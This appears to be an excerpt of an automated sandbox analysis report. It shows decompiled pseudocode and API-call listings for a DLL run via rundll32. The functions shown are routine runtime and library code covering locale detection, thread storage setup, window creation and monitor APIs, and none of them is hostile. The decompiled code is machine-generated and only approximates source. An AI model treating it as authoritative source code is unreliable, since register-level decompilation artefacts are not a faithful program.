                                                                                                        					 *(_t181 - 0x1c) = _t164;
                                                                                                        					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                        					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                        					 *(_t181 - 0x10) = 2;
                                                                                                        					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                        					if(_t131 != 0) {
                                                                                                        						_t133 =  *_t131() & 0x0000ffff;
                                                                                                        						 *(_t181 - 0x14) = _t133;
                                                                                                        						_t134 = _t133 & 0x0000ffff;
                                                                                                        						_t172 = _t134 & 0x3ff;
                                                                                                        						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                        						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                        						 *(_t181 - 0x10) = 4;
                                                                                                        					}
                                                                                                        					_t169 = 0;
                                                                                                        				}
                                                                                                        				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                        				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                        				_t181[0x105] = 0;
                                                                                                        				_t181[0x104] = 0;
                                                                                                        				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                        					_t143 = 0x20;
                                                                                                        					E1003E9B0(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                        					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                        					 *(_t181 - 0x5c) = _t181;
                                                                                                        					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                        					 *(_t181 - 0x48) = 0x10000000;
                                                                                                        					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                        					E1002644F(_t181 - 0x3c, 0x10000000, 0xffffffff);
                                                                                                        					 *(_t181 - 4) = _t169;
                                                                                                        					if(E100264FF(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                        						E10026535(_t181 - 0x3c);
                                                                                                        					}
                                                                                                        					_t176 = 0;
                                                                                                        					if( *(_t181 - 0x10) <= _t169) {
                                                                                                        						L23:
                                                                                                        						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                        						E10026BA9(_t181 - 0x3c);
                                                                                                        						_t92 = _t169;
                                                                                                        						goto L24;
                                                                                                        					} else {
                                                                                                        						while(1) {
                                                                                                        							_t94 = E10026ADC(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
                                                                                                        							if(_t94 != _t169) {
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							_t176 =  &(1[_t176]);
                                                                                                        							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							goto L23;
                                                                                                        						}
                                                                                                        						_t169 = _t94;
                                                                                                        						goto L23;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t92 = 0;
                                                                                                        					L24:
                                                                                                        					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                        					_pop(_t170);
                                                                                                        					_pop(_t177);
                                                                                                        					_pop(_t144);
                                                                                                        					return E10039F21(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                        				}
                                                                                                        			}
                                                                                                        0x10026e65
                                                                                                        0x10026e68
                                                                                                        0x10026e7a
                                                                                                        0x10026e83
                                                                                                        0x10026e8b
                                                                                                        0x10026e98
                                                                                                        0x10026e9b
                                                                                                        0x10026ea2
                                                                                                        0x10026ea6
                                                                                                        0x10026eaa
                                                                                                        0x10026ead
                                                                                                        0x10026eb0
                                                                                                        0x10026ebd
                                                                                                        0x10026ec9
                                                                                                        0x10026ece
                                                                                                        0x10026ed1
                                                                                                        0x10026ed1
                                                                                                        0x10026ed8
                                                                                                        0x10026ed8
                                                                                                        0x10026edd
                                                                                                        0x10026ee0
                                                                                                        0x10026ef7
                                                                                                        0x10026efe
                                                                                                        0x10026f0d
                                                                                                        0x10027043
                                                                                                        0x1002704a
                                                                                                        0x1002705a
                                                                                                        0x1002705d
                                                                                                        0x10027060
                                                                                                        0x10027067
                                                                                                        0x1002706a
                                                                                                        0x10027071
                                                                                                        0x1002707d
                                                                                                        0x10027087
                                                                                                        0x1002708c
                                                                                                        0x1002708c
                                                                                                        0x10027091
                                                                                                        0x10027096
                                                                                                        0x100270b3
                                                                                                        0x100270b3
                                                                                                        0x100270ba
                                                                                                        0x100270bf
                                                                                                        0x00000000
                                                                                                        0x10027098
                                                                                                        0x10027098
                                                                                                        0x1002709f
                                                                                                        0x100270a7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100270a9
                                                                                                        0x100270ad
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100270af
                                                                                                        0x100270b1
                                                                                                        0x00000000
                                                                                                        0x100270b1
                                                                                                        0x10026f13
                                                                                                        0x10026f13
                                                                                                        0x100270c1
                                                                                                        0x100270c4
                                                                                                        0x100270cc
                                                                                                        0x100270cd
                                                                                                        0x100270ce
                                                                                                        0x100270e3
                                                                                                        0x100270e3

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10026E1E
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10026E3F
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10026E50
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10026E86
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10026E8E
                                                                                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10026EA2
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10026EC6
                                                                                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10026ECC
                                                                                                        • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10026F05
                                                                                                        • GetVersion.KERNEL32 ref: 10026F1A
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10026F3F
                                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10026F64
                                                                                                        • _sscanf.LIBCMT ref: 10026F84
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10026FB9
                                                                                                        • ConvertDefaultLocale.KERNEL32(73B74EE0), ref: 10026FBF
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 10026FCE
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10026FDE
                                                                                                        • EnumResourceLanguagesA.KERNEL32 ref: 10026FF9
                                                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 1002702A
                                                                                                        • ConvertDefaultLocale.KERNEL32(73B74EE0), ref: 10027030
                                                                                                        • _memset.LIBCMT ref: 1002704A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                        • API String ID: 434808117-483790700
                                                                                                        • Opcode ID: a8765283e7a25c69eeaeef6d3af8989df0186295ff9f432bddb89f173f0720fe
                                                                                                        • Instruction ID: 88979602e1e95ec442f5de29852bd6d26d68516f4700fd9df8ca4acbe0c86424
                                                                                                        • Opcode Fuzzy Hash: a8765283e7a25c69eeaeef6d3af8989df0186295ff9f432bddb89f173f0720fe
                                                                                                        • Instruction Fuzzy Hash: B6815FB5D002699FDB50DFA5EC84AFEBBF9FB48300F50052AE955E3280DB749A45CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 91%
                                                                                                        			E10045C4C(void* __ebx) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                        				long _t10;
                                                                                                        				void* _t11;
                                                                                                        				int _t12;
                                                                                                        				void* _t18;
                                                                                                        				intOrPtr _t21;
                                                                                                        				long _t26;
                                                                                                        				void* _t30;
                                                                                                        				struct HINSTANCE__* _t37;
                                                                                                        				void* _t40;
                                                                                                        				void* _t42;
                                                                                                        
                                                                                                        				_t30 = __ebx;
                                                                                                        				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                        				if(_t37 != 0) {
                                                                                                        					 *0x10099a74 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                        					 *0x10099a78 = GetProcAddress(_t37, "FlsGetValue");
                                                                                                        					 *0x10099a7c = GetProcAddress(_t37, "FlsSetValue");
                                                                                                        					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                        					__eflags =  *0x10099a74;
                                                                                                        					_t40 = TlsSetValue;
                                                                                                        					 *0x10099a80 = _t7;
                                                                                                        					if( *0x10099a74 == 0) {
                                                                                                        						L6:
                                                                                                        						 *0x10099a78 = TlsGetValue;
                                                                                                        						 *0x10099a74 = 0x10045903;
                                                                                                        						 *0x10099a7c = _t40;
                                                                                                        						 *0x10099a80 = TlsFree;
                                                                                                        					} else {
                                                                                                        						__eflags =  *0x10099a78;
                                                                                                        						if( *0x10099a78 == 0) {
                                                                                                        							goto L6;
                                                                                                        						} else {
                                                                                                        							__eflags =  *0x10099a7c;
                                                                                                        							if( *0x10099a7c == 0) {
                                                                                                        								goto L6;
                                                                                                        							} else {
                                                                                                        								__eflags = _t7;
                                                                                                        								if(_t7 == 0) {
                                                                                                        									goto L6;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t10 = TlsAlloc();
                                                                                                        					__eflags = _t10 - 0xffffffff;
                                                                                                        					 *0x10073004 = _t10;
                                                                                                        					if(_t10 == 0xffffffff) {
                                                                                                        						L15:
                                                                                                        						_t11 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        					} else {
                                                                                                        						_t12 = TlsSetValue(_t10,  *0x10099a78);
                                                                                                        						__eflags = _t12;
                                                                                                        						if(_t12 == 0) {
                                                                                                        							goto L15;
                                                                                                        						} else {
                                                                                                        							E10040037();
                                                                                                        							 *0x10099a74 = E10045834( *0x10099a74);
                                                                                                        							 *0x10099a78 = E10045834( *0x10099a78);
                                                                                                        							 *0x10099a7c = E10045834( *0x10099a7c);
                                                                                                        							 *0x10099a80 = E10045834( *0x10099a80);
                                                                                                        							_t18 = E100407A6();
                                                                                                        							__eflags = _t18;
                                                                                                        							if(_t18 == 0) {
                                                                                                        								L14:
                                                                                                        								E10045936();
                                                                                                        								goto L15;
                                                                                                        							} else {
                                                                                                        								_push(E10045AC2);
                                                                                                        								_t21 =  *((intOrPtr*)(E100458A0( *0x10099a74)))();
                                                                                                        								__eflags = _t21 - 0xffffffff;
                                                                                                        								 *0x10073000 = _t21;
                                                                                                        								if(_t21 == 0xffffffff) {
                                                                                                        									goto L14;
                                                                                                        								} else {
                                                                                                        									_t42 = E10041721(1, 0x214);
                                                                                                        									__eflags = _t42;
                                                                                                        									if(_t42 == 0) {
                                                                                                        										goto L14;
                                                                                                        									} else {
                                                                                                        										_push(_t42);
                                                                                                        										_push( *0x10073000);
                                                                                                        										__eflags =  *((intOrPtr*)(E100458A0( *0x10099a7c)))();
                                                                                                        										if(__eflags == 0) {
                                                                                                        											goto L14;
                                                                                                        										} else {
                                                                                                        											_push(0);
                                                                                                        											_push(_t42);
                                                                                                        											E10045973(_t30, _t37, _t42, __eflags);
                                                                                                        											_t26 = GetCurrentThreadId();
                                                                                                        											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                        											 *_t42 = _t26;
                                                                                                        											_t11 = 1;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					return _t11;
                                                                                                        				} else {
                                                                                                        					E10045936();
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}

















                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1003D0F4,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045C52
                                                                                                        • __mtterm.LIBCMT ref: 10045C5E
                                                                                                          • Part of subcall function 10045936: __decode_pointer.LIBCMT ref: 10045947
                                                                                                          • Part of subcall function 10045936: TlsFree.KERNEL32(00000022,1003D190,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045961
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045C74
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045C81
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045C8E
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045C9B
                                                                                                        • TlsAlloc.KERNEL32(?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045CEB
                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 10045D06
                                                                                                        • __init_pointers.LIBCMT ref: 10045D10
                                                                                                        • __encode_pointer.LIBCMT ref: 10045D1B
                                                                                                        • __encode_pointer.LIBCMT ref: 10045D2B
                                                                                                        • __encode_pointer.LIBCMT ref: 10045D3B
                                                                                                        • __encode_pointer.LIBCMT ref: 10045D4B
                                                                                                        • __decode_pointer.LIBCMT ref: 10045D6C
                                                                                                        • __calloc_crt.LIBCMT ref: 10045D85
                                                                                                        • __decode_pointer.LIBCMT ref: 10045D9F
                                                                                                        • __initptd.LIBCMT ref: 10045DAE
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 10045DB5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                        • API String ID: 2657569430-3819984048
                                                                                                        • Opcode ID: 97235fdea7f486e5ac501621493e85bf53cf30b9c690d1141ec21583f6195202
                                                                                                        • Instruction ID: 19b7df90d523b32f1c3fb40a8f09f3825e5bbcba7fff12f7416c718068a45c80
                                                                                                        • Opcode Fuzzy Hash: 97235fdea7f486e5ac501621493e85bf53cf30b9c690d1141ec21583f6195202
                                                                                                        • Instruction Fuzzy Hash: D0313735D007229AF715DFB98CCA6453BE5FF44661B200A3BF819D29B1DB369440CF95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 87%
                                                                                                        			E10005160(intOrPtr* __esi, intOrPtr _a4) {
                                                                                                        				struct tagRECT _v40;
                                                                                                        				int _v44;
                                                                                                        				void* _v48;
                                                                                                        				CHAR* _v52;
                                                                                                        				struct HMENU__* _v56;
                                                                                                        				intOrPtr _v116;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t37;
                                                                                                        				void* _t42;
                                                                                                        				long _t45;
                                                                                                        				int _t63;
                                                                                                        				signed int _t93;
                                                                                                        				void* _t95;
                                                                                                        				struct HWND__* _t96;
                                                                                                        				int _t121;
                                                                                                        				void* _t135;
                                                                                                        				signed int _t139;
                                                                                                        				long _t140;
                                                                                                        				CHAR* _t141;
                                                                                                        				struct HWND__* _t142;
                                                                                                        				intOrPtr* _t144;
                                                                                                        				void* _t145;
                                                                                                        				long _t155;
                                                                                                        
                                                                                                        				_t144 = __esi;
                                                                                                        				_push(_t135);
                                                                                                        				_t93 = 0 | _a4 != 0x00000000;
                                                                                                        				_t37 = E10005150();
                                                                                                        				_t153 = _t37 - _t93;
                                                                                                        				if(_t37 == _t93) {
                                                                                                        					L5:
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_push(SendMessageA( *(__esi + 0x20), 0x31, 0, 0));
                                                                                                        					_v40.right = E10009228(_t93, __esi, _t135, __esi, _t153);
                                                                                                        					_t42 = E1001F715(__esi);
                                                                                                        					_t45 = E1000778D(_t153, E1001F715(__esi) + 1);
                                                                                                        					_push(_t42 + 1);
                                                                                                        					_push(_t45);
                                                                                                        					_v40.left = _t45;
                                                                                                        					E10011872(_t93, __esi, _t42 + 1, __esi, _t153);
                                                                                                        					_t139 =  *0x1005be9c; // 0x50b001c4
                                                                                                        					_t140 = _t139 & 0xefefff7f;
                                                                                                        					if(_t93 == 0) {
                                                                                                        						_t140 = _t140 | 0x00100080;
                                                                                                        						_t155 = _t140;
                                                                                                        					}
                                                                                                        					_t95 = E1000E5E5(_t93,  *(_t144 + 0x20), _t145, GetParent( *(_t144 + 0x20)));
                                                                                                        					GetWindowRect( *(_t144 + 0x20),  &(_v40.top));
                                                                                                        					E10008D13(_t95,  &(_v40.top));
                                                                                                        					_v48 = E1000E5E5(_t95, _t95, _t145, GetFocus());
                                                                                                        					_v56 = E100116FB(_t144);
                                                                                                        					_t96 = CreateWindowExA(0x200, "edit", 0, _t140, _v44, _v40.left, _v40.top.left - _v44, _v40.right - _v40.left,  *(_t95 + 0x20), _v56,  *(E1000AB19(_t95, _t140, _t144, _t155) + 8), 0);
                                                                                                        					_t156 = _t96;
                                                                                                        					if(_t96 != 0) {
                                                                                                        						E100116BA(_t144, 0);
                                                                                                        						_t141 = _v52;
                                                                                                        						SetWindowTextA(_t96, _t141);
                                                                                                        						_push(_t141);
                                                                                                        						E10007788(_t96, _t141, _t144, __eflags);
                                                                                                        						_t63 = _v44;
                                                                                                        						__eflags = _t63;
                                                                                                        						if(_t63 != 0) {
                                                                                                        							SendMessageA(_t96, 0x30,  *(_t63 + 4), 0);
                                                                                                        						}
                                                                                                        						E10011716(_t144, _v44 + 1);
                                                                                                        						_t142 = E1000E65F(_t96, _t144);
                                                                                                        						SetWindowLongA(_t142, 0xfffffffc,  *( *((intOrPtr*)( *((intOrPtr*)( *_t144 + 0xf0))))()));
                                                                                                        						E1000F2EF(_t144, __eflags, _t96);
                                                                                                        						SendMessageA( *(E1000EFFA(_t144) + 0x20), 0x368, 0, 0);
                                                                                                        						_v48 =  *((intOrPtr*)(_t144 + 0x60));
                                                                                                        						SendMessageA( *(_t144 + 0x20), 0xcb, 1,  &_v48);
                                                                                                        						GetClientRect( *(_t144 + 0x20),  &_v40);
                                                                                                        						E100117F5(_t144, 0, 0, 0, 0, 0, 0x57);
                                                                                                        						E100117F5(_t144, 0, 0, 0, 0, 0, 0x37);
                                                                                                        						E100117F5(_t144, 0, 0, 0, 0, 0, 0x13);
                                                                                                        						UpdateWindow( *(_t144 + 0x20));
                                                                                                        						SetWindowPos(_t142, 0, 0, 0, 0, 0, 0x9f);
                                                                                                        						DestroyWindow(_t142);
                                                                                                        						_t121 =  *0x1005bea0; // 0xfffff
                                                                                                        						SendMessageA( *(_t144 + 0x20), 0xc5, _t121, 0);
                                                                                                        						__eflags = _v116 - _t144;
                                                                                                        						if(_v116 == _t144) {
                                                                                                        							E10011796(_t144);
                                                                                                        						}
                                                                                                        						E100180D5( *((intOrPtr*)(_t144 + 0x54)), 0, 0, 0, 1);
                                                                                                        						return 1;
                                                                                                        					} else {
                                                                                                        						_push(_v48);
                                                                                                        						E10007788(_t96, _t140, _t144, _t156);
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}





























                                                                                                        APIs
                                                                                                        • SendMessageA.USER32 ref: 1000518C
                                                                                                          • Part of subcall function 10009228: __EH_prolog3_catch.LIBCMT ref: 1002A4F5
                                                                                                          • Part of subcall function 1001F715: lstrlenA.KERNEL32(00000000,00000000,?,1001F871,00000000,?,?), ref: 1001F71F
                                                                                                          • Part of subcall function 10011872: __EH_prolog3.LIBCMT ref: 10011879
                                                                                                          • Part of subcall function 10011872: GetWindowTextA.USER32 ref: 1001188F
                                                                                                        • GetParent.USER32(?), ref: 100051E2
                                                                                                        • GetWindowRect.USER32 ref: 100051F9
                                                                                                        • GetFocus.USER32 ref: 1000520B
                                                                                                        • CreateWindowExA.USER32 ref: 1000525F
                                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 10005291
                                                                                                        • SendMessageA.USER32 ref: 100052B1
                                                                                                        • SetWindowLongA.USER32 ref: 100052E1
                                                                                                        • SendMessageA.USER32 ref: 10005309
                                                                                                        • SendMessageA.USER32 ref: 10005322
                                                                                                        • GetClientRect.USER32 ref: 1000532D
                                                                                                          • Part of subcall function 100117F5: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,10005346), ref: 1001181B
                                                                                                        • UpdateWindow.USER32(?), ref: 10005370
                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000009F), ref: 10005386
                                                                                                        • DestroyWindow.USER32(00000000), ref: 1000538D
                                                                                                        • SendMessageA.USER32 ref: 100053A5
                                                                                                          • Part of subcall function 10011796: SetFocus.USER32(?), ref: 1001179F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$MessageSend$FocusRectText$ClientCreateDestroyH_prolog3H_prolog3_catchLongParentUpdatelstrlen
                                                                                                        • String ID: edit$n^t
                                                                                                        • API String ID: 1316460492-3668187526
                                                                                                        • Opcode ID: 93b775d81ad1c7a8146c717d79b0fdc845a746f99c01990191f5c56cfddd1cdf
                                                                                                        • Instruction ID: f8b65c5ace38e4461a1bd77ccaf349567c0a92c9706a8189fdb74921955d5529
                                                                                                        • Opcode Fuzzy Hash: 93b775d81ad1c7a8146c717d79b0fdc845a746f99c01990191f5c56cfddd1cdf
                                                                                                        • Instruction Fuzzy Hash: 97619075704701ABE714DBB4CC9AF2F73A9EB88B40F004A1CF649AB2D1EA74F9018795
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 97%
                                                                                                        			E1000BBFB() {
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				struct HINSTANCE__* _t5;
                                                                                                        				_Unknown_base(*)()* _t6;
                                                                                                        				_Unknown_base(*)()* _t7;
                                                                                                        				_Unknown_base(*)()* _t8;
                                                                                                        				_Unknown_base(*)()* _t9;
                                                                                                        				_Unknown_base(*)()* _t10;
                                                                                                        				_Unknown_base(*)()* _t11;
                                                                                                        				_Unknown_base(*)()* _t12;
                                                                                                        				struct HINSTANCE__* _t18;
                                                                                                        				void* _t20;
                                                                                                        				intOrPtr _t23;
                                                                                                        				_Unknown_base(*)()* _t24;
                                                                                                        
                                                                                                        				_t23 =  *0x10098d2c; // 0x0
                                                                                                        				if(_t23 == 0) {
                                                                                                        					_push(_t20);
                                                                                                        					 *0x10098d30 = E1000BBA3(0, _t20, __eflags);
                                                                                                        					_t18 = GetModuleHandleA("USER32");
                                                                                                        					__eflags = _t18;
                                                                                                        					if(_t18 == 0) {
                                                                                                        						L12:
                                                                                                        						 *0x10098d10 = 0;
                                                                                                        						 *0x10098d14 = 0;
                                                                                                        						 *0x10098d18 = 0;
                                                                                                        						 *0x10098d1c = 0;
                                                                                                        						 *0x10098d20 = 0;
                                                                                                        						 *0x10098d24 = 0;
                                                                                                        						 *0x10098d28 = 0;
                                                                                                        						_t5 = 0;
                                                                                                        					} else {
                                                                                                        						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                        						__eflags = _t6;
                                                                                                        						 *0x10098d10 = _t6;
                                                                                                        						if(_t6 == 0) {
                                                                                                        							goto L12;
                                                                                                        						} else {
                                                                                                        							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                        							__eflags = _t7;
                                                                                                        							 *0x10098d14 = _t7;
                                                                                                        							if(_t7 == 0) {
                                                                                                        								goto L12;
                                                                                                        							} else {
                                                                                                        								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                        								__eflags = _t8;
                                                                                                        								 *0x10098d18 = _t8;
                                                                                                        								if(_t8 == 0) {
                                                                                                        									goto L12;
                                                                                                        								} else {
                                                                                                        									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                        									__eflags = _t9;
                                                                                                        									 *0x10098d1c = _t9;
                                                                                                        									if(_t9 == 0) {
                                                                                                        										goto L12;
                                                                                                        									} else {
                                                                                                        										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                        										__eflags = _t10;
                                                                                                        										 *0x10098d24 = _t10;
                                                                                                        										if(_t10 == 0) {
                                                                                                        											goto L12;
                                                                                                        										} else {
                                                                                                        											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                        											__eflags = _t11;
                                                                                                        											 *0x10098d20 = _t11;
                                                                                                        											if(_t11 == 0) {
                                                                                                        												goto L12;
                                                                                                        											} else {
                                                                                                        												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                        												__eflags = _t12;
                                                                                                        												 *0x10098d28 = _t12;
                                                                                                        												if(_t12 == 0) {
                                                                                                        													goto L12;
                                                                                                        												} else {
                                                                                                        													_t5 = 1;
                                                                                                        													__eflags = 1;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *0x10098d2c = 1;
                                                                                                        					return _t5;
                                                                                                        				} else {
                                                                                                        					_t24 =  *0x10098d20; // 0x0
                                                                                                        					return 0 | _t24 != 0x00000000;
                                                                                                        				}
                                                                                                        			}


















                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(USER32,?,?,?,1000BD47), ref: 1000BC24
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,1000BD47), ref: 1000BC40
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,1000BD47), ref: 1000BC51
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,1000BD47), ref: 1000BC62
                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,1000BD47), ref: 1000BC73
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,1000BD47), ref: 1000BC84
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,1000BD47), ref: 1000BC95
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,1000BD47), ref: 1000BCA6
                                                                                                        Strings
                                                                                                        Memory Dump Source
